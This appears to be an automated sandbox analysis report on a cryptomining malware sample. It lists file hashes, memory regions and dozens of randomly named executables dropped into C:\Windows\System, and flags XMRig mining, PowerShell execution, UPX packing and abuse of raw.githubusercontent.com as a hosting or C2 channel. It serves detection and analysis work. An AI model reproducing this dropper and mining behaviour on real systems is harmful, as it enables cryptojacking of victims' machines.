MD5 c475cdde9b9199c9b865fe62fc03ca00
SHA1 b3e7c39956fe0228819a090fb90a4acf302fc30b
SHA256 32b7fd4b76525b0cb79f603ca3ced288b8a9818e5e72c30bd32a4a78883a8bf1
SHA512 e8c52975898e564ec8baa3ddeb63371350a3240a7e9df86da57990058e888b79a147b8a3bf2d60c622bc9d5f44e05b14ccdc44aa452fc526feeec32a011f813b

memory/2944-12-0x000000013F290000-0x000000013F682000-memory.dmp

memory/2692-13-0x000000013F290000-0x000000013F682000-memory.dmp

C:\Windows\system\VwcbDvJ.exe

MD5 c248b8ffce8b6b2a1d0e4bcc83179f17
SHA1 93638174a3953f85d3fd914565f30642c7d1828d
SHA256 14f56da48b189c22f7a44ebd718f131b44d454b2897cdfef80a1c81156e028b4
SHA512 301cd8332601af5fc0d81059be10b26dff3f1a88d93af985d72b630a40ad15e19ec29b79773d98873897db6abd7758fe2552ff052a7ea294b3ccc6b0dc1f775d

\Windows\system\SOtqlrq.exe

MD5 a50cf8532a73613bb73954862aaa7cb7
SHA1 16dc84f94a8a60eec35771b7467c2522da6bd14a
SHA256 c9d69592b2c04992433ba65fa78d74d7a18dfb8e4274424b53ac986f97ea01b8
SHA512 879c9956a1feab4addf6275180c12d4e45c4e46e35c2fda84c02f40ad68403d95a59a106a618b447bd7b1e6f265367f0b20c1b9822058eaad0850325f9400a5a

C:\Windows\system\lJTSWAI.exe

MD5 5eaca87113ed61b4517c90d46f24f19f
SHA1 2faa00a1618ea159f9f135f4ea3a46de53920a41
SHA256 60469fcdc56372a73bf378d759f526c72db236b9987221e405545bd9b5b23984
SHA512 d0f175c06a8b2860ca244fc5ab71d0e45fee89018b430e248c18f207b9fcb5125a5761a2a63dd5fe89f753399e1e01137b92c727a4bc1272dedff81d1dcb90db

\Windows\system\FAtBTQW.exe

MD5 781e66766e349c279b83541b3022a3e2
SHA1 71921fd2ac021c98c774b2a82df85e231f01c415
SHA256 56c10c801223bc9714ca34ea3c8506846ddc2b1752c874877b8e059cb9ce5f3a
SHA512 a76980921bd5a47017da0014c3811a0f962a84e4e1f3e4251516b9d1b6d0cc99d0f43ab639849e74c73265f745a794920c1d4df16896809174ab05fb273e0d75

memory/2944-37-0x0000000002FA0000-0x0000000003392000-memory.dmp

C:\Windows\system\UJbVddf.exe

MD5 253bc5e0554338e2caa1dd27a0924a78
SHA1 06252b2f627d73f1f4a7168a3b874182bf3cbddb
SHA256 d3ba6b2398d1c75238c7384fbe167797881537291799415cb1d01cd84bbe51db
SHA512 726b71be12949e23ca3a4d76bdf05f22444cc5fb534a100c637eff44c0103f7563e077d24849569d6a7775ea9c9f47e4ef4b9aa58207778c97eb4e35534dcc40

memory/2304-35-0x000007FEF643E000-0x000007FEF643F000-memory.dmp

memory/2304-34-0x00000000026A0000-0x0000000002720000-memory.dmp

C:\Windows\system\irYyHHH.exe

MD5 07a4a94970139ffcd8886ab60b992ee7
SHA1 d35e7ecacd71423c835aeedb87d8b03e0217140c
SHA256 e5c7f66d264b48b6affcadbf33c9dc754e42d3789528b68303e57f888d8a12b5
SHA512 cfd3be150571984ab91b9ab0e48c5df6917053d76474879e7c75a397757f62e8ff5d62d8f2775c622c49a18b5162aa01453cce02d9f96abc0fadca19c22bb83d

C:\Windows\system\dWUHejK.exe

MD5 af80a26f77bbfafab9d492e8b6bd50d4
SHA1 86dfc412e9c052f1c9417dbd9fd4c6f572c64ae3
SHA256 798e9633989d4a594504ba4b9733def2bc35dd3af3efac50cdaa7819d2197a66
SHA512 908cc47cac366dedda70c9062bc5ac2daf51652b8cb2059cb719232c92246f5b468f9249816d0b75687477040a610887cc4723939ce416bfae8221ee37f4d6e4

C:\Windows\system\RQXaead.exe

MD5 0f159ed61b02866092a6d140f700795d
SHA1 ca066c363cd467dc4bb10562d97865da75d5e7dc
SHA256 b2219c669772d152ff7027c39c26f3ef29ce7fafab1a939407423b875441d75d
SHA512 6239501758946e5ab8482bc87a14a8de5600e570f4b3fa9f10827c78567bac63d5a82f2da8aecb47e4b2788a8ff8a49a4649ee26a3f369743aaa2a50b9f08efd

C:\Windows\system\BvzODwb.exe

MD5 be4a833e9f30a3d820a7d29edd10b560
SHA1 f23792972a34a085d62a9701ca1163c005340cb1
SHA256 23c2c466dd3534bf97d9a055f0081004ddbcdd147c596f4009a2b261f482889c
SHA512 a0ace6b6f0724a0df07d8b91bd62820545170dd3b6ef9d2d8407425fc64ecf1805d655100b96c3caa973eb9e4e6b442469e087a43b21bc3f42a2ce8bf7cea69e

C:\Windows\system\lAmdSNg.exe

MD5 fadf441c046e2bf6f5039d9395d8fa98
SHA1 82e32f4844ae0feabc537e889096a65911371ef1
SHA256 81d7bee45dbc5f1480246c939e8fb37ddf9e7c182004ae1afe5dd3df921351c3
SHA512 7dfcdeee6dbaa4ae5665085e84743cc44e4ea0cca7243ba89b3eb020f6014bbca15371c59d26ccf9b11f85f2abf6b8aa3bf491d3ea4ab5417a8ae9ca64902f84

\Windows\system\cwjhGdI.exe

MD5 6563ee0e29ca6da9d483ef1bbd0a62d6
SHA1 34eb1ad413d0ec3a83a1fbf2f6de2c58470156fd
SHA256 619555e09cdb7a419f7cc600ca7dfc5e95b3c4a04dba717ee19466425e7dcbe4
SHA512 0187298c8ca8b75eee462cc2e8f5056e80f94c112f413192215b8c270c0c75d94fd3f37af6fc22b9ada2e86b120d20143aa1c32c55163239fadd380887c819c7

C:\Windows\system\ggSWvZU.exe

MD5 b40353b4d7c49da34d4a3ebf7f72fd39
SHA1 0e538b81aed811db7902799a68abacada8373ad1
SHA256 fca572da3c1297eab62ea6899203ffdae3f1a2f7a0a9b552d5844658a5dc30ba
SHA512 8055529a2576d511f072d1ccccf99fd147ede918004650d4cd20c2165a1e7df905a23be6bd38e6c280266ad7ca94c64ee476c435a5167d84d77adb743b75106a

C:\Windows\system\fKWnkZS.exe

MD5 4d1d5bbbfe39569a3e757d8683646294
SHA1 851146b7881c568a0b43791da5d3a1f5b64db5e1
SHA256 040eb92f7e8b9565f08a48c4797d24b17eda870756462586c5fefc8ec28ae5ba
SHA512 5052ecbe9fee4bbe2262fac82d5cc50b03860d2271d3d4de01d2b399e90cfc1bd3b7af93d0d323dab7b37f12bce07217162c72d0df264244afa4ef6be6b682cc

C:\Windows\system\ZdaqaXL.exe

MD5 921afb34154534a68c94dcacc7042a5d
SHA1 f3b4cac850111ccd9e1b42a33a341d80672595ed
SHA256 65931458ef291daa42778915989e8143d3b928701fa181391d36d5f5bc10d20e
SHA512 33fbc84507d406075e561c7122e70c585e1d724c7402c82cfc60915e0bd1af2916cea4b70208937364ff5048cb648db48a95417c6ccbb189e36213289ac8521f

memory/2304-100-0x0000000001F30000-0x0000000001F38000-memory.dmp

memory/2736-154-0x000000013FAF0000-0x000000013FEE2000-memory.dmp

\Windows\system\XATUWRa.exe

MD5 2fa6dde2d34ff56d06bc03d1a04dae7f
SHA1 941f0668a97ae6cba3adc04d5f4155e8ed2ef9b8
SHA256 7d09de7738fe37b3d05932c66eeff9a9ca4ffc88fd9136b7392890fd58a9a5e5
SHA512 9588aeebc18346fbac3e10bef5418dac46640722e91267e270efc796a512b061b610144aa7c863f029a1378421719c74f76609180fcca305b97d2dc2000e36a2

C:\Windows\system\GJVfUrS.exe

MD5 5e78d1cd9d8a91944dffee89e76d8856
SHA1 518eba6fed97b996845dcdef2d51967d436d1b15
SHA256 6fc5995c3b47bacdbdf9efd3baeabd3df43410a9f80725f56b5e7a1eee2d41ac
SHA512 38eeac65cbc0c2739e18f3e874126d07c0a2f66b798617b0c2e37db9ca9edab5bfe10fbe1f7dff62151bf6e3e1d8461e672aa423fcd83210919f7e1682db6a80

memory/2944-220-0x000000013F100000-0x000000013F4F2000-memory.dmp

memory/2520-218-0x000000013FDC0000-0x00000001401B2000-memory.dmp

memory/2304-214-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

memory/2944-207-0x000000013F430000-0x000000013F822000-memory.dmp

memory/1012-202-0x000000013F460000-0x000000013F852000-memory.dmp

memory/2944-192-0x000000013F200000-0x000000013F5F2000-memory.dmp

memory/520-187-0x000000013F800000-0x000000013FBF2000-memory.dmp

memory/3024-180-0x000000013F650000-0x000000013FA42000-memory.dmp

\Windows\system\hpjuQFi.exe

MD5 5b46a2872a7579a9cd0d90dec4c633f3
SHA1 35c3f4dd10fada191e1fa8854610c60815ea2d7b
SHA256 2b437b439245e18b1c19c7019b1eb1fbfe4193d724c48c6e2c6b8b169fefcb25
SHA512 1394ea5797f8193425e3c1f99466b3597679eedee78f9017e246688ca51101e498bf940e874dc657f983cbf76ac5c6fb39b681117694742d6af541924ad3be71

memory/2388-171-0x000000013FE60000-0x0000000140252000-memory.dmp

\Windows\system\qHYbYrJ.exe

MD5 13906f5c416f213962854378ee8a9a1e
SHA1 7e169bedd705ddc6cd5441ba01f57b95f7f82f22
SHA256 bd0813cd892007b5db99665aa07682b838c83eb4d531faa47ca4c75efaff5031
SHA512 0ccce6f3872d71e5ca3ba235a8b7c63edc1f221bf98e6e109b596b2d77fba2bfd901bf1b399e0b98256b1cec7e482b0fe7a42850f358700e6f6d1b9838a87e0f

memory/2944-161-0x000000013F650000-0x000000013FA42000-memory.dmp

memory/2556-159-0x000000013FF60000-0x0000000140352000-memory.dmp

\Windows\system\vUfOhJm.exe

MD5 9d1643c82d914980b720d91602431d2c
SHA1 abf599fb67e44ffc8e67415ebaff6417f4c25982
SHA256 72cd5983a35e7cf6e79e14435674f96156a47e00e4098b26840415f7ac4a0817
SHA512 bed31308b6c9387f22eb68ee57057bb3cf7f63397f14a67b1a027eb161dfac87106642e9496308982e66d917ae62a17600ab4d5ce348c827b4e3d04b5a30b88c

\Windows\system\vveTePb.exe

MD5 de4475421fd2345f059fe33bee8f1377
SHA1 6a2e0c3067924134e8678dff17171db1c23de3cc
SHA256 aab375a80689f60c21ac9169abbf826b88c422c6ed9c3dbd399c47a024b83359
SHA512 42b92dda641c90cf09fc6ff73173ef78692d82b0b9c03508940aa581978357ec291f7f478b1d34c6ae94dd298f8847c4b29e50f6ac803a738069435d696fd361

memory/2944-143-0x0000000002FA0000-0x0000000003392000-memory.dmp

C:\Windows\system\ffjrNUO.exe

MD5 a122a75dd62dc2fe652c1b7220d9b90b
SHA1 c10cfd248ac5381e5d9a03fb98da2eea49bc54a1
SHA256 e58934b471a38e9a2eb7bf8b4ced36767e67063ca69acb079d6d57738334a375
SHA512 1058b67048e4ff9dc727695ee389ce9ab87f994c9a77538164150ae1ed0880ea95e7d4452625d0ca3824feca94cc6f993fccb434120bdb3f21b6305275ec8354

\Windows\system\xqRPAQy.exe

MD5 56f71f7b4285b67c82ce1b2445a1e821
SHA1 9e529211bd13d29703c9a2d749bcfcb950ff5eaa
SHA256 0144fef7ac6ecd20f9f48a922431fa36fd189f33ef3b4186e2fc125dc47f95ae
SHA512 f090aa9d44a87093d6da904e2dccda76974e1c29ab9a16cd7db6a91cc6b8cb44384b444df51e6d85e67feb338d9d67c57d54015d3df5e4f103a3e891e4b1dddb

memory/2304-135-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

C:\Windows\system\yTzlWJD.exe

MD5 ab596471b1dabf2f2a9cec3e22dcac02
SHA1 c3ae1800fecd0554692db1554b078eb64dea5bec
SHA256 64973654ea579ab952c6833a9fa6ff8969f4e8db27aed8f20b700649b4a469fd
SHA512 6fa7bb483eda088128eaa2bb5a95624d8e3910d21190dd5219fcea72ebbcdb7974777e512f138fd1bcf00180c5cb3d77bc0febba87e9c7a9905ecf1719670e79

\Windows\system\Qgxxpbt.exe

MD5 8b7c4c4d95bee32a9f887dfe23eed9b9
SHA1 dcb15638e9c1828ffd63f38665a918d4b39ff23f
SHA256 953f2961bde645a76b78a2b114ef672e7cfe4fbafa764a4c2fd7da192b8324e9
SHA512 e26e9b90241293c02c664f2cb5983b3b9bf53b6a1a8c3bacb80d14358feb157373a80f6a6bef0d9fb282c8b6bb3b3d9fee7281f8ddf29532865a1dd80c936a4c

\Windows\system\PPRAmWH.exe

MD5 4bd8c54113f1527c8bb890f406db9c56
SHA1 5a0661eb510053d4df9a248180308a3c3dc0fccd
SHA256 89e7e30cc63dd28458833f36784b4c997227a257ebaf71e77df33f1910189954
SHA512 87e5cf30d2f4f197ddcc2143e4d31b77154db2bebbd161ff8e418b2bb5c6604d4e8d595ab661ac0b0861514777ce3bcaf4365c74b164c588827eab720427bb18

C:\Windows\system\zSjaltF.exe

MD5 f99048f6033a6dba2ae313f247ef66e8
SHA1 ce28d29417abcd7d47071bffa8acd7c1f331a58c
SHA256 5be1d45dad6beb5519af4d674667b6b36d9a2f457f9d98a28202df1672f93c0b
SHA512 66ff10bb2194d287dcdf342c150eaa8a3d61a3bd3aaf397423cd8ec84d5f233279ebbfdb61ffe95c9ec3d5070a39f1040b67c69efe874817e9393c8103452402

\Windows\system\DUJukZH.exe

MD5 4c411f763f83613f51f27b3187612397
SHA1 bd9fd1d22b73e6a4ddd08efffe7af801f9095ab6
SHA256 9221b57467e52ad03a3365410690777bb08274e5ebf2737210f501c523b0e6ed
SHA512 de3f08880fc1ac473a89c3a114821c83d261567d3b4f5b1b7427793a6715373780564e565c143b2f616a2ec8147774a526143dcb1aca5cbbb0a2fc4fd549fb75

\Windows\system\SOoPPnV.exe

MD5 eb710b497582a0faccd29ce2dbd7a896
SHA1 e8d7b08cfcb459fa3e44d022b750290ef0582792
SHA256 e463872b559d8e115742f3024040ffd4e5435b5c05a856adec1c5dc9c07bafe6
SHA512 353e507425e444bdfbc91c7abc7a61ccbddfb3192c5c83cd88547294c9b759bc428a5e9a200eeea2c48939725e2a57d0c43a7566a684779e786e3fbef55cdc64

memory/2944-194-0x000000013F460000-0x000000013F852000-memory.dmp

memory/2944-184-0x00000000032C0000-0x00000000036B2000-memory.dmp

\Windows\system\xKrpqqH.exe

MD5 fcf44cd0e665613b87f17bd2cfad4076
SHA1 ca2bcfdf066e649a295ea8bea7c8404edb3f3bc9
SHA256 14d0ef45209cb4ddd23496f8033b478be5387c312d03b4ec77cb0d3cd9b11b33
SHA512 478d58c2fdd712b78feb64f167fb6f793de3454572ae2bb634878f06f561d853b9c879c93ab8415dd176b4a1c5008d5f9d317038f263763de4ee64548cdde1c5

memory/2944-176-0x00000000032C0000-0x00000000036B2000-memory.dmp

memory/2944-167-0x00000000032C0000-0x00000000036B2000-memory.dmp

memory/2504-166-0x000000013F100000-0x000000013F4F2000-memory.dmp

memory/2944-156-0x00000000032C0000-0x00000000036B2000-memory.dmp

C:\Windows\system\BBVjZpy.exe

MD5 b6adb4a04cab6a102795ff401f38f387
SHA1 20aee54e550ccd6ba1744fabfaac29bf8513a024
SHA256 caf747902dc761be4305afbcbc76177415b532ca9fdfa73fac6d5af805f38f3a
SHA512 65fa351b598e84138bc1c8b116e197e24321341785083ee49c546c4451e35b2434b0c7f91cb8408b93c2ccc252d0459d5549789b420ebfaaa97a90da887eb98c

memory/2304-340-0x000007FEF6180000-0x000007FEF6B1D000-memory.dmp

C:\Windows\system\dykxEMP.exe

MD5 7f617a1074903e80b5b36cc5825ac119
SHA1 1c7786719dc783447379721188ea5965d817d742
SHA256 e94b7eade9463db8c8c0521311314157d4fd7bc47e15ddcd2db4e7f7409d4577
SHA512 c44a26dd6099460e707425a957eabe156a0aa48fea560b05d54d111431abf561ef43e7ea1d832c57b0bf530ffc47d33f4b92fd11d4cbf0a3ba2ec0827802caeb

C:\Windows\system\yCxHXfY.exe

MD5 b4f769ae516248c438633045384272de
SHA1 204dd75c89351d539f7e1593b79c9c231cba0a7f
SHA256 32f623208e51c559841232fce6f942321703a5c24960ba1e6a49175c23192e94
SHA512 b276862bc5ab0292807faa89d762007bf4ed87770802c2f5a1cc148596c5f3fe3375212951f4a9165b5fd4a8ca8c9fa5560720ea0c00065a85f44cca3a19c33f

C:\Windows\system\bZcGdyX.exe

MD5 45e0e1494ef6cc87a2b9d5a9fe366121
SHA1 e2887fd87eca46b3b9edb261c9ca47cd60f10cf6
SHA256 f41376f523e502e785ef7ad1f47539b3add3bdcdbe0e44c15cc43bbc939b89f3
SHA512 8538503c8128869d74619d3f34096ab49158efe3c292c89360c61d201d3b0596030242d7810f4b3b7de3d5b324594a279f6ccbbc55d5540b1e62431aa61c1f95

C:\Windows\system\wNVhfXN.exe

MD5 85abc087b7e55031b83948f269b1f1a7
SHA1 1c09a4576aeeb2b7a8ff2f482d26c3ef71a367fd
SHA256 b07d5941f8b529998cec38859a98295d85b126ca0e3a30ab804fbfd21c2faa83
SHA512 8a476c03aeffb114f1d04541127295e9a62d95178a3a088c777242aec6eb13a16f9b039e451697adefb46ee78a1b3f654c192b0626944472e5d386839d49c350

memory/2304-99-0x000000001B3F0000-0x000000001B6D2000-memory.dmp

C:\Windows\system\CgGAGbN.exe

MD5 8df8db7ea4cf7067ba263ff537b1a90c
SHA1 37c188ed655e14e77ac39ed6e88b50aabfda7c68
SHA256 8a67b867111aec4807c6c90a9cec61f0fe784a4e9aee03c89548deb516577cc8
SHA512 ae035e1dccfcb5a5282f3f3d82653c08eb85844c507893d74fbd9f565b536a5bece948ec0d6d38701fd2572bd7b43913535b676d311d9c7eede26c8bead84f44

C:\Windows\system\BvJFzGC.exe

MD5 7c36cf60f6ae585211eb9c13e3d410ea
SHA1 eddb201dc71ee40dd85651766bdfd95d182b498a
SHA256 3c45a65e9110b3c34dfbafbd18800bca1ce0cd672ea1b212272ab497135df877
SHA512 b43a5d374cda3b1595a0bebdde37e1d7a658ef03a156bd2da96acf4c1ce97bb1fb1baea2344ba964049485776faebbfd92ea38c92b63fb891d4079b24e6e83b5

memory/2768-33-0x000000013F430000-0x000000013F822000-memory.dmp

memory/2596-30-0x000000013F030000-0x000000013F422000-memory.dmp

memory/2736-2730-0x000000013FAF0000-0x000000013FEE2000-memory.dmp

memory/2596-2740-0x000000013F030000-0x000000013F422000-memory.dmp

C:\Windows\system\cHbxnZn.exe

MD5 e216125f6ec8a71ed511fce858ed30eb
SHA1 050cc8d12c9a1af3716df8cd26567943726d3366
SHA256 2097394cabc160a9df2f746df2b02abe3caad35caebdb855f94e869ef6004673
SHA512 1ac9f8982e0ad73ffc5075b337a3e3f491f85f11a7d1a7e27a4798e5b39f52143905d90909f5a0732fa6e625f6b0719a56e5ded5ac563b3a5f32c20c4c30e446

memory/2768-3883-0x000000013F430000-0x000000013F822000-memory.dmp

memory/2692-3885-0x000000013F290000-0x000000013F682000-memory.dmp

memory/2556-4441-0x000000013FF60000-0x0000000140352000-memory.dmp

memory/3024-4539-0x000000013F650000-0x000000013FA42000-memory.dmp

memory/2504-4538-0x000000013F100000-0x000000013F4F2000-memory.dmp

memory/2388-4872-0x000000013FE60000-0x0000000140252000-memory.dmp

memory/1012-4874-0x000000013F460000-0x000000013F852000-memory.dmp

memory/2520-4902-0x000000013FDC0000-0x00000001401B2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-12 10:45

Reported

2024-06-12 10:48

Platform

win10v2004-20240508-en

Max time kernel

71s

Max time network

54s

Command Line

"C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\ccnEONW.exe N/A
N/A N/A C:\Windows\System\LtrsFba.exe N/A
N/A N/A C:\Windows\System\qehyiJd.exe N/A
N/A N/A C:\Windows\System\FkTHiwm.exe N/A
N/A N/A C:\Windows\System\bKlqQNq.exe N/A
N/A N/A C:\Windows\System\ATJYyhC.exe N/A
N/A N/A C:\Windows\System\uDSjORa.exe N/A
N/A N/A C:\Windows\System\FuwmPqR.exe N/A
N/A N/A C:\Windows\System\XCWhGge.exe N/A
N/A N/A C:\Windows\System\lyRAgRu.exe N/A
N/A N/A C:\Windows\System\YnzVeLh.exe N/A
N/A N/A C:\Windows\System\FLDVURt.exe N/A
N/A N/A C:\Windows\System\BfeyzeJ.exe N/A
N/A N/A C:\Windows\System\XuLMMnN.exe N/A
N/A N/A C:\Windows\System\mERGCIb.exe N/A
N/A N/A C:\Windows\System\hsTWsvU.exe N/A
N/A N/A C:\Windows\System\JWjrjXT.exe N/A
N/A N/A C:\Windows\System\GGNowJC.exe N/A
N/A N/A C:\Windows\System\IkFKVgk.exe N/A
N/A N/A C:\Windows\System\SeIvyYQ.exe N/A
N/A N/A C:\Windows\System\yGMzmaZ.exe N/A
N/A N/A C:\Windows\System\DtEpMZX.exe N/A
N/A N/A C:\Windows\System\HzTawYv.exe N/A
N/A N/A C:\Windows\System\iyajVLp.exe N/A
N/A N/A C:\Windows\System\wVrfVAm.exe N/A
N/A N/A C:\Windows\System\uIGnMmK.exe N/A
N/A N/A C:\Windows\System\GnkVESL.exe N/A
N/A N/A C:\Windows\System\BsAWsvH.exe N/A
N/A N/A C:\Windows\System\fDyJZew.exe N/A
N/A N/A C:\Windows\System\FJlmAjg.exe N/A
N/A N/A C:\Windows\System\EYiVzfP.exe N/A
N/A N/A C:\Windows\System\OyTwYWk.exe N/A
N/A N/A C:\Windows\System\bhinvRW.exe N/A
N/A N/A C:\Windows\System\TGtlnzn.exe N/A
N/A N/A C:\Windows\System\oHYewLx.exe N/A
N/A N/A C:\Windows\System\hHlloZd.exe N/A
N/A N/A C:\Windows\System\NNRuCtZ.exe N/A
N/A N/A C:\Windows\System\IzhjXLR.exe N/A
N/A N/A C:\Windows\System\wGZuNdy.exe N/A
N/A N/A C:\Windows\System\eGBvAVY.exe N/A
N/A N/A C:\Windows\System\XCeRFYN.exe N/A
N/A N/A C:\Windows\System\obiyzwz.exe N/A
N/A N/A C:\Windows\System\fuHUkcq.exe N/A
N/A N/A C:\Windows\System\PegjuAD.exe N/A
N/A N/A C:\Windows\System\IUZKAvI.exe N/A
N/A N/A C:\Windows\System\uOuNVwp.exe N/A
N/A N/A C:\Windows\System\joLmFSP.exe N/A
N/A N/A C:\Windows\System\vbfchRa.exe N/A
N/A N/A C:\Windows\System\votVYzq.exe N/A
N/A N/A C:\Windows\System\OamBMVr.exe N/A
N/A N/A C:\Windows\System\sEKxrYj.exe N/A
N/A N/A C:\Windows\System\YmoAFHM.exe N/A
N/A N/A C:\Windows\System\KAAOIyl.exe N/A
N/A N/A C:\Windows\System\Bjchdih.exe N/A
N/A N/A C:\Windows\System\tUkGBEc.exe N/A
N/A N/A C:\Windows\System\nQivZam.exe N/A
N/A N/A C:\Windows\System\LdmxZuZ.exe N/A
N/A N/A C:\Windows\System\hbHeyPO.exe N/A
N/A N/A C:\Windows\System\WDntoNw.exe N/A
N/A N/A C:\Windows\System\GAsHbDE.exe N/A
N/A N/A C:\Windows\System\CHorVvx.exe N/A
N/A N/A C:\Windows\System\hLKDEsp.exe N/A
N/A N/A C:\Windows\System\XuDtrVP.exe N/A
N/A N/A C:\Windows\System\GIIZOQy.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\NRdyDND.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lDSCxil.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YKoxZUm.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HdGnqKz.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AIQpDre.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VYsPutL.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\lxQHqCZ.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zVZrCNK.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kPeyOdx.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YIYlmLC.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sbShYGb.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\suFnrTg.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PHGLVuz.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aZWtwRx.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\oBcKeGR.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zxxowwp.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nJumGnT.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XwUAhce.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\eMaNXrd.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SYvtGTD.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\eHOXqOZ.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JqPVCgr.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rWehAkH.exe C:\Users\Admin\AppData\Local\Temp\341372798c11cb8bcea1a340c56edad0_NeikiAnalytics.exe N/A
